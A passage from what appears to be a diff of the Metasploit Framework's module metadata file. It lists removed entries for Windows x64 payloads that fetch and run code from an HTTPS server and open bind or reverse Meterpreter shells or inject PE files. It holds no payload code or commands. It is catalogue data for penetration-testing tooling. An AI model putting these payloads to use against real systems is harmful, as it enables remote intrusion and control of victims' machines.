"adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/https/x64/meterpreter/bind_tcp": { - "name": "HTTPS Fetch, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/https/x64/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/https/x64/meterpreter/bind_tcp_rc4": { - "name": "HTTPS Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/https/x64/meterpreter/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an 
HTTPS server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/https/x64/meterpreter/bind_tcp_uuid": { - "name": "HTTPS Fetch, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/https/x64/meterpreter/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - 
"needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/https/x64/meterpreter/reverse_http": { - "name": "HTTPS Fetch, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/https/x64/meterpreter/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_http", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_cmd/windows/https/x64/meterpreter/reverse_https": { - "name": "HTTPS Fetch, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/https/x64/meterpreter/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "agix", - 
"rwincey" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_https", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_https" - }, - "payload_cmd/windows/https/x64/meterpreter/reverse_named_pipe": { - "name": "HTTPS Fetch, Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/https/x64/meterpreter/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker via a named pipe pivot", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter/reverse_named_pipe", - 
"check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_named_pipe", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - "payload_cmd/windows/https/x64/meterpreter/reverse_tcp": { - "name": "HTTPS Fetch, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/https/x64/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/https/x64/meterpreter/reverse_tcp_rc4": { - "name": "HTTPS Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/https/x64/meterpreter/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": 
"payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/https/x64/meterpreter/reverse_tcp_uuid": { - "name": "HTTPS Fetch, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/https/x64/meterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": 
"/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/https/x64/meterpreter/reverse_winhttp": { - "name": "HTTPS Fetch, Windows x64 Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/https/x64/meterpreter/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_winhttp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_cmd/windows/https/x64/meterpreter/reverse_winhttps": { - "name": "HTTPS Fetch, 
Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/cmd/windows/https/x64/meterpreter/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTPS (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_winhttps", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "payload_cmd/windows/https/x64/meterpreter_bind_named_pipe": { - "name": "HTTPS Fetch, Windows Meterpreter Shell, Bind Named Pipe Inline (x64)", - "fullname": "payload/cmd/windows/https/x64/meterpreter_bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "UserExistsError", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect to victim and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter_bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter_bind_named_pipe", - "staged": false - }, - "payload_cmd/windows/https/x64/meterpreter_bind_tcp": { - "name": "HTTPS Fetch, Windows Meterpreter Shell, Bind TCP Inline (x64)", - "fullname": "payload/cmd/windows/https/x64/meterpreter_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect to victim and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter_bind_tcp", - "staged": false - }, - "payload_cmd/windows/https/x64/meterpreter_reverse_http": { - "name": "HTTPS Fetch, Windows Meterpreter Shell, Reverse HTTP Inline (x64)", - "fullname": "payload/cmd/windows/https/x64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/windows/https/x64/meterpreter_reverse_https": { - "name": "HTTPS Fetch, Windows Meterpreter Shell, Reverse HTTPS Inline (x64)", - "fullname": "payload/cmd/windows/https/x64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/windows/https/x64/meterpreter_reverse_ipv6_tcp": { - "name": "HTTPS Fetch, Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)", - "fullname": "payload/cmd/windows/https/x64/meterpreter_reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter_reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter_reverse_ipv6_tcp", - "staged": false - }, - "payload_cmd/windows/https/x64/meterpreter_reverse_tcp": { - "name": "HTTPS Fetch, Windows Meterpreter Shell, Reverse TCP Inline x64", - "fullname": "payload/cmd/windows/https/x64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/https/x64/peinject/bind_ipv6_tcp": { - "name": "HTTPS Fetch, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/https/x64/peinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/peinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": 
"windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/https/x64/peinject/bind_ipv6_tcp_uuid": { - "name": "HTTPS Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/https/x64/peinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/peinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/https/x64/peinject/bind_named_pipe": { - "name": "HTTPS Fetch, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/https/x64/peinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, 
- "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/peinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/peinject/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/https/x64/peinject/bind_tcp": { - "name": "HTTPS Fetch, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/https/x64/peinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/peinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/peinject/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/https/x64/peinject/bind_tcp_rc4": { - "name": "HTTPS Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/https/x64/peinject/bind_tcp_rc4", - "aliases": [], - "rank": 
300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/peinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/peinject/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/https/x64/peinject/bind_tcp_uuid": { - "name": "HTTPS Fetch, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/https/x64/peinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/peinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - 
"default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/peinject/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/https/x64/peinject/reverse_named_pipe": { - "name": "HTTPS Fetch, Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/https/x64/peinject/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker via a named pipe pivot", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/peinject/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/peinject/reverse_named_pipe", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - "payload_cmd/windows/https/x64/peinject/reverse_tcp": { - "name": "HTTPS Fetch, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/https/x64/peinject/reverse_tcp", - "aliases": [], - "rank": 300, - 